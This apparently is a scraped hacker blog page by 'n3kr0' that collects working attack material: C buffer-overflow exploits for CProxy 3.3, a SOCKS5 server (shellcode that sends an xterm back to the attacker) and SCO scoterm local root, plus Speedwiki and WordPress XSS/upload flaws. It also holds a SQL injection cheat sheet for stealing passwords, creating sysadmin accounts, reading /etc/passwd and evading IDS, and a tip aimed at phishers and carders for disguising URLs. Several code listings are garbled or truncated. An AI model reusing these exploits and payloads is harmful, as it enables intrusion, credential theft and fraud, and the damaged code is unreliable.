Xploits an overflow vulnerability in CProxy 3.3


/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define BUFFERSIZE 247 // length of the host field that main() places in the request line
#define NOP 0x90 // filler byte for the first BUFFERSIZE-8 bytes of that field
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161 // "aaaa"; stored last in the payload, adjusted by argv[2] in main()
#define EBP 0x61616161 // "aaaa"; stored just before EIP, adjusted by argv[3] in main()

/*
 * Print the command-line synopsis to stderr and terminate the process
 * with exit status 1. Never returns to the caller.
 */
void usage(char *progname)
{
    fprintf(stderr, "Usage: %s [eip] [ebp]\n", progname);
    exit(1);
}

/*
 * Entry point. argv[1] is the target host; argv[2] and argv[3] are optional
 * decimal adjustments added to the EIP and EBP constants. Several lines of
 * this listing were damaged when the page was extracted (text between '<'
 * and '>' is missing on the argument check, the name-resolution branch and
 * the line after connect()), so the body below cannot be compiled as shown
 * and the tail of main() is not on this page.
 * Defender's note: the observable artifact is an HTTP request to port 8080
 * whose request-line host field is about 247 bytes, almost all 0x90.
 */
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024]; // buffer: the oversized host field; remotedos: the full request
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock; // aux is unused in the visible code
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");

if (argc<2)>=3) eip+=atol(argv[2]); // damaged line: the argc check (presumably a usage() call) and the argc>=3 test collapsed together

if (argc>=4) ebp+=atol(argv[3]);

ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8); // first BUFFERSIZE-8 (239) bytes: 0x90 filler
ptr+=sizeof(buffer)-8;
long_ptr=(unsigned long*)ptr;
*(long_ptr++) = ebp; // then ebp and eip as native unsigned long values
*(long_ptr++) = eip;
ptr=(char *)long_ptr;
*ptr='\0'; // NOTE(review): with a 4-byte unsigned long this store lands at buffer[247], one past the end of the 247-byte array; on LP64 the two stores are 8 bytes each and overrun further

bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer); // the payload becomes the host part of an absolute-URI request line

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < he =" gethostbyname(argv[1]))" ip =" *(unsigned">h_addr; // damaged line: the socket() check and the gethostbyname() branch collapsed together
} else {
if ((ip = inet_addr(argv[1])) == NULL) { // NOTE(review): inet_addr() returns an integer and signals failure with INADDR_NONE; comparing with NULL (0) only catches 0.0.0.0
perror("inet_addr()");
return -1;
}
}

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(8080); // the CProxy HTTP service port named in the file header

fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) <> // damaged line: the rest of main() (presumably the send of remotedos) is missing from this page

# Friday by n3kr0

X-ploit Speedwiki 2.0

product :Speedwiki 2.0
vendor site: http://speedywiki.sourceforge.net/
risk:critical


A logged-in user can upload a PHP script to the server through the upload script; there is actually no upload filter in this CMS.
path : /speedywiki/index.php?upload=1

XSS (GET):
/index.php?showRevisions='">




Full path disclosure:
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# Sunday by n3kr0

Bug 4 karders

va para todos akellos dedikados al phishing o karders --> pasar la IP a hexadecimal de la web a disfrazar ej. www.google.com --> I.P. dir --> 72.14.207.99 --> hexadecimal http://0x48.0x0e.0xcf.0x63 click para ver ;) karders, su vida vuelve a tomar un nuevo giro lollll

# Monday by n3kr0

Bug Wordpress 2.0.1

link a explotar: http://host.domain.tld/wp-admin/options-general.php?page=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E

Fix:

$ svn diff wp-admin/admin.php
Index: wp-admin/admin.php
===================================================================
— wp-admin/admin.php (revision 3513)
+++ wp-admin/admin.php (working copy)
@@ -61,7 +61,7 @@
} if (! file_exists(ABSPATH . “wp-content/plugins/$plugin_page”))
- die(sprintf(__(’Cannot load %s.’), $plugin_page));
+ die(sprintf(__(’Cannot load %s.’), htmlentities($plugin_page)));
if (! isset($_GET[’noheader’])) require_once(ABSPATH . ‘/wp-admin/admin-header.php’);
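Review bot: `htmlentities($plugin_page)` on the added line runs with PHP's default flags, so single quotes pass through unescaped; that is adequate while the message is emitted as body text by die(), but it would not hold if the same string were ever placed inside an attribute — `htmlentities($plugin_page, ENT_QUOTES)` makes the escaping independent of the output context. The enclosing code begins outside the hunk, so whether $plugin_page is constrained to a plugin filename before the file_exists() call on the line above cannot be judged from here.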

;)

# by n3kr0

Sql Injection

Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'

Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.
Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.

# Thursday by n3kr0

Remote exploit for Socks5

/*
* !!!! Private do not distribute !!!!
*
* <1080r2.c> definitive socks5 remote exploit / linux x86
*
* Usage:
* $ xhost +
* $ ./1080r2 [offset]
* => And wait a xterm to be sent back to you...
*
* Vulnerables: (offset)
* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r10 (compiled on a redhat 6.0) => 400
* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?
* socks5-0.17-1 (redhat 4.2) => no
* socks5-1.0r10-5 (redhat-contrib) => no??
* socks5-server-1.0r6-8TL (TurboContrib) => no??
*
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define NOP 0x90 // filler byte (x86 no-op)
#define MAXLEN 2000 // size of the global buf[]
#define OFFSET 0x7fffd99d // TurboLinux 4.0.5 -- address value repeated in the payload; argv[3] adjusts it
#define ALIGN 3 // byte offset within buf of the first copy of that address
#define LENGTH 195 // bytes of buf that main() fills (the last one becomes the terminator)

/*
 * x86 Linux shellcode that execve()s /usr/X11R6/bin/xterm with a "-display"
 * argument (syscall 0xb through int $0x80, per the annotations below). The
 * display string is not part of the literal: main() strcat()s argv[2] and
 * ":0" onto this array at run time, and the two 'A' bytes are replaced by
 * NUL by the two movb stores so the strings are terminated. The array is
 * sized 120 bytes; nothing checks that the appended display name fits.
 */
char hell[120]=
"\xeb\x29" // jmp 0x13
"\x5e" // popl %esi
"\x89\x76\x30" // movl %esi,0x30(%esi)
"\x89\xf0" // movl %esi,%eax
"\x83\xc0\x15" // addl $0x15,%eax
"\x89\x46\x34" // movl %eax,0x34(%esi)
"\x83\xc0\x09" // addl $0x9,%eax
"\x89\x46\x38" // movl %eax,0x38(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x89\x46\x3c" // movl %eax,0x3c(%esi)
"\x88\x46\x14" // movb %eax,0x14(%esi)
"\x88\x46\x1d" // movb %eax,0x1d(%esi)
"\xb0\x0b" // movb $0xb,%al
"\x89\xf3" // movl %esi,%ebx
"\x8d\x4e\x30" // leal 0x30(%esi),%ecx
"\x8d\x56\x3c" // leal 0x3c(%esi),%edx
"\xcd\x80" // int $0x80
"\xe8\xd2\xff\xff\xff" // call -0x22
"/usr/X11R6/bin/xtermA"
"-displayA"
//"127.0.0.1:0"
;


char buf[MAXLEN]; // payload assembled by main(); zero-initialised as a global, only LENGTH bytes are filled

/*
 * Entry point (pre-C99 implicit-int main).
 *   argv[1] : target host, resolved with gethostbyname() below
 *   argv[2] : X display host, appended to the shellcode in hell[] as "<argv[2]>:0"
 *   argv[3] : optional decimal offset added to OFFSET (defaults to 0)
 * Builds buf (NOP filler, repeated address, shellcode), performs the SOCKS5
 * method negotiation on port 1080 and then sends a CONNECT request whose
 * domain-name field is the whole of buf.
 * Defender's note: the observable artifact is a SOCKS5 CONNECT (ATYP 0x03)
 * whose name field is ~194 bytes of mostly 0x90 followed by machine code;
 * a proxy that bounds and validates that field before copying it is the
 * check this code relies on being absent.
 */
main(int argc, char *argv[]) {
struct sockaddr_in to;
char buff[1000]; // protocol messages exchanged with the proxy
int sd; // connected socket
int pktlen;
struct hostent *hp;
int i;
long *addr;
int off; // final address value written into buf (OFFSET + argv[3])
int alin;
int len;
int offset;

if(argc==4) {
offset=atoi(argv[3]); // no error checking: non-numeric input silently becomes 0
} else {
if(argc==3) {
offset=0;
} else {
printf("Uso: ./1080r2 [offset]\n"); // "Uso" = "Usage"; the host/display placeholders were lost in extraction
exit(0); }
}

len=LENGTH;
off=OFFSET+offset;
alin=ALIGN;

strcat(hell,argv[2]); // NOTE(review): hell[] is a fixed 120-byte array and argv[2] is unbounded, so a long argument overruns it
strcat(hell,":0");

memset(buf,NOP,len); // buf[0..len-1] = 0x90; buf is a zeroed global, so the rest stays 0
memcpy(buf+len-strlen(hell)-1,hell,strlen(hell)); // shellcode ends at buf[len-2]; buf[len-1] becomes the terminator below

addr=(long *)(buf+alin);
for (i=0;i<46;i+=4)
*(addr++) = off; // 12 copies (i = 0,4,...,44) of the address starting at buf+ALIGN

buf[len-1]='\0'; // so strlen(buf) == len-1 in the snprintf() below

to.sin_family=AF_INET;
to.sin_port = htons(1080); // SOCKS port

if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()"); // perror() reports errno, which gethostbyname() does not set; h_errno carries the lookup error
exit(0); }

if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0); }

memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);

if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {
perror("connect()");
exit(0); }
printf("Connect: Ready to send overflow...\n");
//getchar();

// start: SOCKS5 method negotiation (client greeting)

pktlen=3;
buff[0]=0x5; // SOCKS version 5
buff[1]=0x1; // one authentication type...

buff[2]=0x0; // no authentication
//buff[2]=0x2; // userpass

if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }

if(read(sd, buff, 2)!=2) { // server method selection: version byte + chosen method
perror("read error");
exit(-1); }

if(buff[0] != 0x5) {
printf("invalid response\n");
exit(-1); }

if(buff[1] == 0xf) { // NOTE(review): "no acceptable methods" is 0xFF in SOCKS5, and buff is a plain char; this comparison looks like a typo and probably never matches
printf("proxy requires authenticationn"); // the literal itself lacks a trailing newline ("authenticationn")
exit(-1); }

if(buff[1] != 0x0) {
printf("proxy returned an invalid authentication type\n");
exit(-1); }

// authentication (username/password sub-negotiation, disabled)
/*
printf("\ndone\n");
printf("sending autentificacion request...");

pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",
strlen(username), username, strlen(password), password);

send(sd, buff, pktlen, 0);

recv(sd, buff, 2, 0);

if(buff[1] != 0x00) {
printf("username/password invalid\n");
exit (1); }
*/
// connection

for(i=1;i<=len;i++)
putchar(buf[i]); // echoes the payload; the loop runs 1..len, so it skips buf[0] and reads buf[len] (still inside the MAXLEN array)

printf("\ndone\n");
printf("sending connection request...");

pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c", // version, CONNECT (0x01), reserved byte, ATYP 0x03 (domain name): length byte, name, 2-byte port
0x00, strlen(buf), buf, 0x11, 0x22); // NOTE(review): %c consumes an int; passing a size_t is a type mismatch in the variadic call

if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }

if(read(sd, buff, 4)!=4) { // reply header: version, status, reserved, ATYP
perror("read error (1)");
exit(-1); }

switch(buff[1]) { // SOCKS5 reply status codes
case 0: printf("succeeded\n"); break;
case 1: printf("general SOCKS server failure\n"); exit(-1);
case 2: printf("connection not allowed by ruleset\n"); exit(-1);
case 3: printf("network unreachable\n"); exit(-1);
case 4: printf("host unreachable\n"); exit(-1);
case 5: printf("connection refused\n"); exit(-1);
case 6: printf("TTL expired\n"); exit(-1);
case 7: printf("command not supported (?)\n"); exit(-1);
case 8: printf("address type not supported\n"); exit(-1);
default: printf("returned unknown error code\n"); exit(-1);
}

}

# by n3kr0

Local root exploit for scoterm

/*
* Local root exploit
*
* Usage:
* $ cc scotermx.c -o scotermx
* $ scoterm
* $ /usr/bin/X11/scoterm -geometry `scotermx 0`
* or
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
*
* Note: scoterm need to be run from a valid x-display
*
* By: The Dark Raver of t0s (Murcia/Spain - 21/6/99)
*
* -
*
*/


#include
#include


/*
 * Raw x86 shellcode, SCO flavour: the system call is made through
 * "lcall 0x7,0x0" rather than int $0x80 (compare the Linux payload earlier
 * on this page). It is byte-for-byte the annotated, commented-out listing
 * that follows; see that for the instruction stream. It contains no NUL
 * byte, which is why main() can size it with strlen().
 */
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/


#define OFF 0x80452ff // SCO OpenServer 5.0.4 -- base address value; argv[1] is added to it in main()
#define ALINEA 1 // alignment (Spanish "alinea") added to the 1100 start offset of the address loop
#define LEN 2000 // size of the argument buffer built in main()


/*
 * Entry point. argv[1] is a decimal offset (atoi) added to the OFF constant
 * by the loop below. The argument check and the loop are damaged in this
 * listing (text between '<' and '>' was lost in extraction, and the page is
 * cut off in the middle of the for statement), so the body cannot be
 * compiled as shown and the remainder of main() is not on this page.
 */
int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN]; // 2000-byte value handed to scoterm -geometry (see the usage comment above)
int i;

if(argc <>\n"); // damaged line: the argc test and the usage message were lost in extraction
exit(0); }
else {
offset=atoi(argv[1]); } // no error checking: non-numeric input silently becomes 0

memset(buf,0x90,LEN); // 0x90 filler over the whole buffer
memcpy(buf+1000,hell,strlen(hell)); // shellcode at offset 1000 (hell[] has no NUL byte, so strlen() covers all of it)
for(i=1100+ALINEA;i // truncated: presumably the loop that stores OFF+offset from buf+1100+ALINEA onward; its bound and the rest of main() are missing

# by n3kr0

fuck!!

fuck off!

# by n3kr0